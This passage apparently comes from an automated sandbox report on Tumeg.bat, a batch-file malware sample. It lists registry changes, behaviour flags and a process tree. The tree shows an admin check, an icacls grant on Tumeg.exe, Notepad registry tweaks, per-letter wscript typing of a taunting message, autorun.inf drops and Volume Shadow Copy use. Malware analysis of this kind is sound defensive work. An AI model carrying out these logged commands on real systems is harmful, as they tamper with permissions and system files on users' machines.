Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\Total\ = "823" SearchApp.exe Set value (str) \REGISTRY\USER\S-1-5-21-2319007114-3335580451-2147236418-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Settings\Cache\History\CachePrefix = "Visited:" SearchApp.exe Key created \REGISTRY\USER\S-1-5-21-2319007114-3335580451-2147236418-1000_Classes\Local Settings cmd.exe Key created \REGISTRY\USER\S-1-5-21-2319007114-3335580451-2147236418-1000_Classes\Local Settings\MuiCache StartMenuExperienceHost.exe Key created \REGISTRY\USER\S-1-5-21-2319007114-3335580451-2147236418-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage SearchApp.exe Set value (data) \REGISTRY\USER\S-1-5-21-2319007114-3335580451-2147236418-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = 020000000100000000000000ffffffff explorer.exe Set value (int) \REGISTRY\USER\S-1-5-21-2319007114-3335580451-2147236418-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\windows.search\Total = "856" SearchApp.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\ explorer.exe Key created \REGISTRY\USER\S-1-5-21-2319007114-3335580451-2147236418-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell explorer.exe Key created \REGISTRY\USER\S-1-5-21-2319007114-3335580451-2147236418-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\Total SearchApp.exe Key created \REGISTRY\USER\S-1-5-21-2319007114-3335580451-2147236418-1000_Classes\Local Settings explorer.exe Key created \REGISTRY\USER\S-1-5-21-2319007114-3335580451-2147236418-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\microsoft.windows.search SearchApp.exe Set value (data) \REGISTRY\USER\S-1-5-21-2319007114-3335580451-2147236418-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots = 020202 explorer.exe Key created \REGISTRY\USER\S-1-5-21-2319007114-3335580451-2147236418-1000_Classes\Local Settings\MuiCache SearchApp.exe Key created \REGISTRY\USER\S-1-5-21-2319007114-3335580451-2147236418-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell explorer.exe Set value (str) \REGISTRY\USER\S-1-5-21-2319007114-3335580451-2147236418-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Settings\Cache\Cookies\CachePrefix = "Cookie:" SearchApp.exe Set value (int) \REGISTRY\USER\S-1-5-21-2319007114-3335580451-2147236418-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\microsoft.windows.search\ = "823" SearchApp.exe Key created \REGISTRY\USER\S-1-5-21-2319007114-3335580451-2147236418-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\microsoft.windows.search SearchApp.exe Set value (data) \REGISTRY\USER\S-1-5-21-2319007114-3335580451-2147236418-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.PeopleExperienceHost_cw5n1h2txyewy\ApplicationFrame\Microsoft.Windows.PeopleExperienceHo = 6801000088020000 explorer.exe Key created \REGISTRY\USER\S-1-5-21-2319007114-3335580451-2147236418-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell explorer.exe Set value (data) \REGISTRY\USER\S-1-5-21-2319007114-3335580451-2147236418-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots = 020202 explorer.exe Set value (int) \REGISTRY\USER\S-1-5-21-2319007114-3335580451-2147236418-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\Total\ = "856" SearchApp.exe Set value (data) \REGISTRY\USER\S-1-5-21-2319007114-3335580451-2147236418-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.PeopleExperienceHost_cw5n1h2txyewy\ApplicationFrame\Microsoft.Windows.PeopleExperienceHo = 6801000088020000 explorer.exe Key created \REGISTRY\USER\S-1-5-21-2319007114-3335580451-2147236418-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DomStorageState SearchApp.exe Key created \REGISTRY\USER\S-1-5-21-2319007114-3335580451-2147236418-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage SearchApp.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{4336a54d-038b-4685-ab02-99bb52d3fb8b}\Instance\ explorer.exe Key created \REGISTRY\USER\S-1-5-21-2319007114-3335580451-2147236418-1000_Classes\Local Settings explorer.exe Key created \REGISTRY\USER\S-1-5-21-2319007114-3335580451-2147236418-1000_Classes\Local Settings\MuiCache StartMenuExperienceHost.exe Key created \REGISTRY\USER\S-1-5-21-2319007114-3335580451-2147236418-1000_Classes\Local Settings explorer.exe Set value (str) \REGISTRY\USER\S-1-5-21-2319007114-3335580451-2147236418-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Settings\Cache\Cookies\CachePrefix = "Cookie:" SearchApp.exe Key created \REGISTRY\USER\S-1-5-21-2319007114-3335580451-2147236418-1000_Classes\Local Settings\MuiCache SearchApp.exe Key created \REGISTRY\USER\S-1-5-21-2319007114-3335580451-2147236418-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\TrayNotify explorer.exe Key created \REGISTRY\USER\S-1-5-21-2319007114-3335580451-2147236418-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\microsoft.windows.search SearchApp.exe Set value (int) \REGISTRY\USER\S-1-5-21-2319007114-3335580451-2147236418-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\windows.search\Total = "823" SearchApp.exe Key created \REGISTRY\USER\S-1-5-21-2319007114-3335580451-2147236418-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU explorer.exe Set value (str) \REGISTRY\USER\S-1-5-21-2319007114-3335580451-2147236418-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Settings\Cache\Cookies\CachePrefix = "Cookie:" SearchApp.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{4336a54d-038b-4685-ab02-99bb52d3fb8b}\Instance\ explorer.exe Set value (str) \REGISTRY\USER\S-1-5-21-2319007114-3335580451-2147236418-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Settings\Cache\Content\CachePrefix SearchApp.exe Key created \REGISTRY\MACHINE\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\Deployment\Package\*\S-1-5-21-2319007114-3335580451-2147236418-1000\{9CC36C91-DC31-4CAC-A118-2FACE1F182E5} explorer.exe Key created \REGISTRY\USER\S-1-5-21-2319007114-3335580451-2147236418-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\EdpDomStorage\windows.search SearchApp.exe Set value (data) \REGISTRY\USER\S-1-5-21-2319007114-3335580451-2147236418-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = 020000000100000000000000ffffffff explorer.exe Set value (str) \REGISTRY\USER\S-1-5-21-2319007114-3335580451-2147236418-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Settings\Cache\Content\CachePrefix SearchApp.exe Set value (data) \REGISTRY\USER\S-1-5-21-2319007114-3335580451-2147236418-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.PeopleExperienceHost_cw5n1h2txyewy\ApplicationFrame\Microsoft.Windows.PeopleExperienceHo = 6801000088020000 explorer.exe Key created \REGISTRY\USER\S-1-5-21-2319007114-3335580451-2147236418-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU explorer.exe Key created \REGISTRY\MACHINE\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\Deployment\Package\*\S-1-5-21-2319007114-3335580451-2147236418-1000\{77596BDE-2886-4636-8A28-8CB1447349C0} explorer.exe Key created \REGISTRY\USER\S-1-5-21-2319007114-3335580451-2147236418-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\EdpDomStorage\windows.search SearchApp.exe Key created \REGISTRY\USER\S-1-5-21-2319007114-3335580451-2147236418-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DomStorageState SearchApp.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{4336a54d-038b-4685-ab02-99bb52d3fb8b}\Instance\ explorer.exe Set value (int) \REGISTRY\USER\S-1-5-21-2319007114-3335580451-2147236418-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\microsoft.windows.search\ = "823" SearchApp.exe -
Opens file in notepad (likely ransom note) 1 IoCs
pid Process 3456 NOTEPAD.EXE -
Runs net.exe
-
Runs ping.exe 1 TTPs 2 IoCs
pid Process 3804 PING.EXE 1448 PING.EXE -
Suspicious behavior: EnumeratesProcesses 16 IoCs
pid Process 4136 msedge.exe 4136 msedge.exe 4580 msedge.exe 4580 msedge.exe 6052 WMIC.exe 6052 WMIC.exe 6052 WMIC.exe 6052 WMIC.exe 1400 identity_helper.exe 1400 identity_helper.exe 6452 msedge.exe 6452 msedge.exe 6452 msedge.exe 6452 msedge.exe 4528 msedge.exe 4528 msedge.exe -
Suspicious behavior: GetForegroundWindowSpam 2 IoCs
pid Process 5580 explorer.exe 5860 explorer.exe -
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 29 IoCs
pid Process 4580 msedge.exe 4580 msedge.exe 4580 msedge.exe 4580 msedge.exe 4580 msedge.exe 4580 msedge.exe 4580 msedge.exe 4580 msedge.exe 4580 msedge.exe 4580 msedge.exe 4580 msedge.exe 4580 msedge.exe 4580 msedge.exe 4580 msedge.exe 4580 msedge.exe 4580 msedge.exe 4580 msedge.exe 4580 msedge.exe 4580 msedge.exe 4580 msedge.exe 4580 msedge.exe 4580 msedge.exe 4580 msedge.exe 4580 msedge.exe 4580 msedge.exe 4580 msedge.exe 4580 msedge.exe 4580 msedge.exe 4580 msedge.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeDebugPrivilege 3400 taskkill.exe Token: SeDebugPrivilege 2964 taskkill.exe Token: SeShutdownPrivilege 5068 explorer.exe Token: SeCreatePagefilePrivilege 5068 explorer.exe Token: SeShutdownPrivilege 5068 explorer.exe Token: SeCreatePagefilePrivilege 5068 explorer.exe Token: SeShutdownPrivilege 5068 explorer.exe Token: SeCreatePagefilePrivilege 5068 explorer.exe Token: SeShutdownPrivilege 5068 explorer.exe Token: SeCreatePagefilePrivilege 5068 explorer.exe Token: SeShutdownPrivilege 5068 explorer.exe Token: SeCreatePagefilePrivilege 5068 explorer.exe Token: SeShutdownPrivilege 5068 explorer.exe Token: SeCreatePagefilePrivilege 5068 explorer.exe Token: SeShutdownPrivilege 5068 explorer.exe Token: SeCreatePagefilePrivilege 5068 explorer.exe Token: SeShutdownPrivilege 5068 explorer.exe Token: SeCreatePagefilePrivilege 5068 explorer.exe Token: SeShutdownPrivilege 5068 explorer.exe Token: SeCreatePagefilePrivilege 5068 explorer.exe Token: SeShutdownPrivilege 5068 explorer.exe Token: SeCreatePagefilePrivilege 5068 explorer.exe Token: SeShutdownPrivilege 5068 explorer.exe Token: SeCreatePagefilePrivilege 5068 explorer.exe Token: SeShutdownPrivilege 5068 explorer.exe Token: SeCreatePagefilePrivilege 5068 explorer.exe Token: SeShutdownPrivilege 5068 explorer.exe Token: SeCreatePagefilePrivilege 5068 explorer.exe Token: SeShutdownPrivilege 5068 explorer.exe Token: SeCreatePagefilePrivilege 5068 explorer.exe Token: SeShutdownPrivilege 5068 explorer.exe Token: SeCreatePagefilePrivilege 5068 explorer.exe Token: SeShutdownPrivilege 5068 explorer.exe Token: SeCreatePagefilePrivilege 5068 explorer.exe Token: SeShutdownPrivilege 5068 explorer.exe Token: SeCreatePagefilePrivilege 5068 explorer.exe Token: SeShutdownPrivilege 4804 explorer.exe Token: SeCreatePagefilePrivilege 4804 explorer.exe Token: SeShutdownPrivilege 4804 explorer.exe Token: SeCreatePagefilePrivilege 4804 explorer.exe Token: SeShutdownPrivilege 4804 explorer.exe Token: SeCreatePagefilePrivilege 4804 explorer.exe Token: SeShutdownPrivilege 4804 explorer.exe Token: SeCreatePagefilePrivilege 4804 explorer.exe Token: 33 2508 AUDIODG.EXE Token: SeIncBasePriorityPrivilege 2508 AUDIODG.EXE Token: SeShutdownPrivilege 4804 explorer.exe Token: SeCreatePagefilePrivilege 4804 explorer.exe Token: SeShutdownPrivilege 4804 explorer.exe Token: SeCreatePagefilePrivilege 4804 explorer.exe Token: SeShutdownPrivilege 4804 explorer.exe Token: SeCreatePagefilePrivilege 4804 explorer.exe Token: SeShutdownPrivilege 4804 explorer.exe Token: SeCreatePagefilePrivilege 4804 explorer.exe Token: SeShutdownPrivilege 4804 explorer.exe Token: SeCreatePagefilePrivilege 4804 explorer.exe Token: SeShutdownPrivilege 4804 explorer.exe Token: SeCreatePagefilePrivilege 4804 explorer.exe Token: SeShutdownPrivilege 4804 explorer.exe Token: SeCreatePagefilePrivilege 4804 explorer.exe Token: SeShutdownPrivilege 4804 explorer.exe Token: SeCreatePagefilePrivilege 4804 explorer.exe Token: SeShutdownPrivilege 4804 explorer.exe Token: SeCreatePagefilePrivilege 4804 explorer.exe -
Suspicious use of FindShellTrayWindow 64 IoCs
pid Process 5068 explorer.exe 5068 explorer.exe 5068 explorer.exe 5068 explorer.exe 5068 explorer.exe 5068 explorer.exe 5068 explorer.exe 5068 explorer.exe 5068 explorer.exe 5068 explorer.exe 5068 explorer.exe 4580 msedge.exe 5068 explorer.exe 5068 explorer.exe 5068 explorer.exe 5068 explorer.exe 5068 explorer.exe 5068 explorer.exe 5068 explorer.exe 5068 explorer.exe 5068 explorer.exe 5068 explorer.exe 4804 explorer.exe 4804 explorer.exe 4804 explorer.exe 4804 explorer.exe 4804 explorer.exe 4804 explorer.exe 4804 explorer.exe 4804 explorer.exe 4804 explorer.exe 4804 explorer.exe 4804 explorer.exe 4804 explorer.exe 4804 explorer.exe 4804 explorer.exe 4804 explorer.exe 4804 explorer.exe 4804 explorer.exe 4804 explorer.exe 4804 explorer.exe 4804 explorer.exe 4804 explorer.exe 4804 explorer.exe 4804 explorer.exe 4804 explorer.exe 4804 explorer.exe 4804 explorer.exe 4804 explorer.exe 4804 explorer.exe 4804 explorer.exe 4804 explorer.exe 4804 explorer.exe 4804 explorer.exe 4804 explorer.exe 4804 explorer.exe 4804 explorer.exe 4804 explorer.exe 4804 explorer.exe 4804 explorer.exe 4804 explorer.exe 4804 explorer.exe 4804 explorer.exe 4804 explorer.exe -
Suspicious use of SendNotifyMessage 64 IoCs
pid Process 5068 explorer.exe 5068 explorer.exe 5068 explorer.exe 5068 explorer.exe 5068 explorer.exe 5068 explorer.exe 5068 explorer.exe 5068 explorer.exe 5068 explorer.exe 5068 explorer.exe 5068 explorer.exe 5068 explorer.exe 4804 explorer.exe 4804 explorer.exe 4804 explorer.exe 4804 explorer.exe 4804 explorer.exe 4804 explorer.exe 4804 explorer.exe 4804 explorer.exe 4804 explorer.exe 4804 explorer.exe 4804 explorer.exe 4804 explorer.exe 4804 explorer.exe 4804 explorer.exe 4804 explorer.exe 4804 explorer.exe 4804 explorer.exe 4804 explorer.exe 4804 explorer.exe 4804 explorer.exe 4804 explorer.exe 4804 explorer.exe 4804 explorer.exe 4804 explorer.exe 4804 explorer.exe 4804 explorer.exe 4804 explorer.exe 4804 explorer.exe 4804 explorer.exe 4804 explorer.exe 4804 explorer.exe 4804 explorer.exe 5788 explorer.exe 5788 explorer.exe 5788 explorer.exe 5788 explorer.exe 5788 explorer.exe 5788 explorer.exe 5788 explorer.exe 5788 explorer.exe 5788 explorer.exe 5788 explorer.exe 5788 explorer.exe 5392 explorer.exe 5392 explorer.exe 5392 explorer.exe 5392 explorer.exe 5392 explorer.exe 5392 explorer.exe 5392 explorer.exe 5392 explorer.exe 5392 explorer.exe -
Suspicious use of SetWindowsHookEx 30 IoCs
pid Process 1952 StartMenuExperienceHost.exe 3644 TextInputHost.exe 3644 TextInputHost.exe 1460 StartMenuExperienceHost.exe 3792 SearchApp.exe 5856 TextInputHost.exe 5856 TextInputHost.exe 5976 TextInputHost.exe 6056 StartMenuExperienceHost.exe 5976 TextInputHost.exe 5440 StartMenuExperienceHost.exe 3760 SearchApp.exe 4204 TextInputHost.exe 4204 TextInputHost.exe 3272 StartMenuExperienceHost.exe 5780 SearchApp.exe 5580 explorer.exe 6712 TextInputHost.exe 6712 TextInputHost.exe 6516 StartMenuExperienceHost.exe 4468 SearchApp.exe 2396 TextInputHost.exe 2396 TextInputHost.exe 5580 StartMenuExperienceHost.exe 5596 SearchApp.exe 2180 TextInputHost.exe 2180 TextInputHost.exe 6308 StartMenuExperienceHost.exe 5468 SearchApp.exe 5860 explorer.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 4028 wrote to memory of 2712 4028 cmd.exe 82 PID 4028 wrote to memory of 2712 4028 cmd.exe 82 PID 2712 wrote to memory of 3732 2712 net.exe 83 PID 2712 wrote to memory of 3732 2712 net.exe 83 PID 4028 wrote to memory of 520 4028 cmd.exe 84 PID 4028 wrote to memory of 520 4028 cmd.exe 84 PID 1396 wrote to memory of 4728 1396 cmd.exe 105 PID 1396 wrote to memory of 4728 1396 cmd.exe 105 PID 4728 wrote to memory of 1308 4728 net.exe 106 PID 4728 wrote to memory of 1308 4728 net.exe 106 PID 1396 wrote to memory of 4632 1396 cmd.exe 107 PID 1396 wrote to memory of 4632 1396 cmd.exe 107 PID 1396 wrote to memory of 2728 1396 cmd.exe 108 PID 1396 wrote to memory of 2728 1396 cmd.exe 108 PID 1396 wrote to memory of 4400 1396 cmd.exe 109 PID 1396 wrote to memory of 4400 1396 cmd.exe 109 PID 1396 wrote to memory of 3184 1396 cmd.exe 110 PID 1396 wrote to memory of 3184 1396 cmd.exe 110 PID 1396 wrote to memory of 1448 1396 cmd.exe 111 PID 1396 wrote to memory of 1448 1396 cmd.exe 111 PID 1396 wrote to memory of 64 1396 cmd.exe 112 PID 1396 wrote to memory of 64 1396 cmd.exe 112 PID 1396 wrote to memory of 976 1396 cmd.exe 113 PID 1396 wrote to memory of 976 1396 cmd.exe 113 PID 1396 wrote to memory of 4276 1396 cmd.exe 114 PID 1396 wrote to memory of 4276 1396 cmd.exe 114 PID 1396 wrote to memory of 228 1396 cmd.exe 115 PID 1396 wrote to memory of 228 1396 cmd.exe 115 PID 1396 wrote to memory of 4512 1396 cmd.exe 116 PID 1396 wrote to memory of 4512 1396 cmd.exe 116 PID 1396 wrote to memory of 1340 1396 cmd.exe 117 PID 1396 wrote to memory of 1340 1396 cmd.exe 117 PID 1396 wrote to memory of 3104 1396 cmd.exe 118 PID 1396 wrote to memory of 3104 1396 cmd.exe 118 PID 1396 wrote to memory of 3864 1396 cmd.exe 119 PID 1396 wrote to memory of 3864 1396 cmd.exe 119 PID 1396 wrote to memory of 192 1396 cmd.exe 120 PID 1396 wrote to memory of 192 1396 cmd.exe 120 PID 1396 wrote to memory of 4524 1396 cmd.exe 121 PID 1396 wrote to memory of 4524 1396 cmd.exe 121 PID 1396 wrote to memory of 664 1396 cmd.exe 122 PID 1396 wrote to memory of 664 1396 cmd.exe 122 PID 1396 wrote to memory of 4972 1396 cmd.exe 123 PID 1396 wrote to memory of 4972 1396 cmd.exe 123 PID 1396 wrote to memory of 1776 1396 cmd.exe 124 PID 1396 wrote to memory of 1776 1396 cmd.exe 124 PID 1396 wrote to memory of 628 1396 cmd.exe 125 PID 1396 wrote to memory of 628 1396 cmd.exe 125 PID 1396 wrote to memory of 4992 1396 cmd.exe 126 PID 1396 wrote to memory of 4992 1396 cmd.exe 126 PID 1396 wrote to memory of 4764 1396 cmd.exe 127 PID 1396 wrote to memory of 4764 1396 cmd.exe 127 PID 1396 wrote to memory of 2388 1396 cmd.exe 128 PID 1396 wrote to memory of 2388 1396 cmd.exe 128 PID 1396 wrote to memory of 3228 1396 cmd.exe 129 PID 1396 wrote to memory of 3228 1396 cmd.exe 129 PID 1396 wrote to memory of 3636 1396 cmd.exe 130 PID 1396 wrote to memory of 3636 1396 cmd.exe 130 PID 1396 wrote to memory of 4604 1396 cmd.exe 131 PID 1396 wrote to memory of 4604 1396 cmd.exe 131 PID 1396 wrote to memory of 1772 1396 cmd.exe 132 PID 1396 wrote to memory of 1772 1396 cmd.exe 132 PID 1396 wrote to memory of 224 1396 cmd.exe 133 PID 1396 wrote to memory of 224 1396 cmd.exe 133 -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
-
Uses Volume Shadow Copy WMI provider
The Volume Shadow Copy service is used to manage backups/snapshots.
-
Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
-
Views/modifies file attributes 1 TTPs 4 IoCs
pid Process 5736 attrib.exe 5780 attrib.exe 332 attrib.exe 6052 attrib.exe
Processes
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\Tumeg.bat"1⤵
- Suspicious use of WriteProcessMemory
PID:4028 -
C:\Windows\system32\net.exenet session2⤵
- Suspicious use of WriteProcessMemory
PID:2712 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 session3⤵PID:3732
-
-
-
C:\Windows\system32\choice.exechoice /c YN /n /m ""2⤵PID:520
-
-
C:\Windows\System32\rundll32.exeC:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding1⤵PID:2312
-
C:\Windows\System32\NOTEPAD.EXE"C:\Windows\System32\NOTEPAD.EXE" C:\Users\Admin\AppData\Local\Temp\Tumeg.bat1⤵
- Opens file in notepad (likely ransom note)
PID:3456
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\Tumeg.bat"1⤵
- Checks computer location settings
- Drops autorun.inf file
- Drops file in System32 directory
- Drops file in Windows directory
- Modifies registry class
- Suspicious use of WriteProcessMemory
PID:1396 -
C:\Windows\system32\net.exenet session2⤵
- Suspicious use of WriteProcessMemory
PID:4728 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 session3⤵PID:1308
-
-
-
C:\Windows\system32\choice.exechoice /c YN /n /m ""2⤵PID:4632
-
-
C:\Windows\system32\icacls.exeicacls "C:\ProgramData\Tumeg.exe" /grant Administrators:(OI)(CI)F2⤵
- Modifies file permissions
PID:2728
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Notepad" /v iPointSize /t REG_DWORD /d 36 /f2⤵PID:4400
-
-
C:\Windows\system32\notepad.exenotepad2⤵PID:3184
-
-
C:\Windows\system32\PING.EXEping 127.0.0.1 -n 22⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:1448
-
-
C:\Windows\system32\wscript.exewscript.exe "C:\type.vbs" "Y"2⤵PID:64
-
-
C:\Windows\system32\wscript.exewscript.exe "C:\type.vbs" "o"2⤵PID:976
-
-
C:\Windows\system32\wscript.exewscript.exe "C:\type.vbs" "u"2⤵PID:4276
-
-
C:\Windows\system32\wscript.exewscript.exe "C:\type.vbs" "r"2⤵PID:228
-
-
C:\Windows\system32\wscript.exewscript.exe "C:\type.vbs" " "2⤵PID:4512
-
-
C:\Windows\system32\wscript.exewscript.exe "C:\type.vbs" "P"2⤵PID:1340
-
-
C:\Windows\system32\wscript.exewscript.exe "C:\type.vbs" "C"2⤵PID:3104
-
-
C:\Windows\system32\wscript.exewscript.exe "C:\type.vbs" " "2⤵PID:3864
-
-
C:\Windows\system32\wscript.exewscript.exe "C:\type.vbs" "i"2⤵PID:192
-
-
C:\Windows\system32\wscript.exewscript.exe "C:\type.vbs" "s"2⤵PID:4524
-
-
C:\Windows\system32\wscript.exewscript.exe "C:\type.vbs" " "2⤵PID:664
-
-
C:\Windows\system32\wscript.exewscript.exe "C:\type.vbs" "f"2⤵PID:4972
-
-
C:\Windows\system32\wscript.exewscript.exe "C:\type.vbs" "u"2⤵PID:1776
-
-
C:\Windows\system32\wscript.exewscript.exe "C:\type.vbs" "c"2⤵PID:628
-
-
C:\Windows\system32\wscript.exewscript.exe "C:\type.vbs" "k"2⤵PID:4992
-
-
C:\Windows\system32\wscript.exewscript.exe "C:\type.vbs" "e"2⤵PID:4764
-
-
C:\Windows\system32\wscript.exewscript.exe "C:\type.vbs" "d"2⤵PID:2388
-
-
C:\Windows\system32\wscript.exewscript.exe "C:\type.vbs" " "2⤵PID:3228
-
-
C:\Windows\system32\wscript.exewscript.exe "C:\type.vbs" "b"2⤵PID:3636
-
-
C:\Windows\system32\wscript.exewscript.exe "C:\type.vbs" "y"2⤵PID:4604
-
-
C:\Windows\system32\wscript.exewscript.exe "C:\type.vbs" " "2⤵PID:1772
-
-
C:\Windows\system32\wscript.exewscript.exe "C:\type.vbs" "T"2⤵PID:224
-
-
C:\Windows\system32\wscript.exewscript.exe "C:\type.vbs" "u"2⤵PID:2736
-
-
C:\Windows\system32\wscript.exewscript.exe "C:\type.vbs" "m"2⤵PID:2836
-
-
C:\Windows\system32\wscript.exewscript.exe "C:\type.vbs" "e"2⤵PID:2952
-
-
C:\Windows\system32\wscript.exewscript.exe "C:\type.vbs" "g"2⤵PID:2424
-
-
C:\Windows\system32\wscript.exewscript.exe "C:\type.vbs" "!"2⤵PID:1764
-
-
C:\Windows\system32\wscript.exewscript.exe "C:\type.vbs" " "2⤵PID:816
-
-
C:\Windows\system32\wscript.exewscript.exe "C:\type.vbs" "R"2⤵PID:1348
-
-
C:\Windows\system32\wscript.exewscript.exe "C:\type.vbs" "e"2⤵PID:2280
-
-
C:\Windows\system32\wscript.exewscript.exe "C:\type.vbs" "m"2⤵PID:700
-
-
C:\Windows\system32\wscript.exewscript.exe "C:\type.vbs" "e"2⤵PID:2484
-
-
C:\Windows\system32\wscript.exewscript.exe "C:\type.vbs" "m"2⤵PID:3716
-
-
C:\Windows\system32\wscript.exewscript.exe "C:\type.vbs" "b"2⤵PID:784
-
-
C:\Windows\system32\wscript.exewscript.exe "C:\type.vbs" "e"2⤵PID:2248
-
-
C:\Windows\system32\wscript.exewscript.exe "C:\type.vbs" "r"2⤵PID:2964
-
-
C:\Windows\system32\wscript.exewscript.exe "C:\type.vbs" ","2⤵PID:3456
-
-
C:\Windows\system32\wscript.exewscript.exe "C:\type.vbs" " "2⤵PID:2628
-
-
C:\Windows\system32\wscript.exewscript.exe "C:\type.vbs" "y"2⤵PID:1064
-
-
C:\Windows\system32\wscript.exewscript.exe "C:\type.vbs" "o"2⤵PID:1588
-
-
C:\Windows\system32\wscript.exewscript.exe "C:\type.vbs" "u"2⤵PID:1448
-
-
C:\Windows\system32\wscript.exewscript.exe "C:\type.vbs" " "2⤵PID:5100
-
-
C:\Windows\system32\wscript.exewscript.exe "C:\type.vbs" "c"2⤵PID:976
-
-
C:\Windows\system32\wscript.exewscript.exe "C:\type.vbs" "a"2⤵PID:4276
-
-
C:\Windows\system32\wscript.exewscript.exe "C:\type.vbs" "n"2⤵PID:228
-
-
C:\Windows\system32\wscript.exewscript.exe "C:\type.vbs" "'"2⤵PID:4512
-
-
C:\Windows\system32\wscript.exewscript.exe "C:\type.vbs" "t"2⤵PID:1340
-
-
C:\Windows\system32\wscript.exewscript.exe "C:\type.vbs" " "2⤵PID:3104
-
-
C:\Windows\system32\wscript.exewscript.exe "C:\type.vbs" "e"2⤵PID:3864
-
-
C:\Windows\system32\wscript.exewscript.exe "C:\type.vbs" "s"2⤵PID:192
-
-
C:\Windows\system32\wscript.exewscript.exe "C:\type.vbs" "c"2⤵PID:4524
-
-
C:\Windows\system32\wscript.exewscript.exe "C:\type.vbs" "a"2⤵PID:664
-
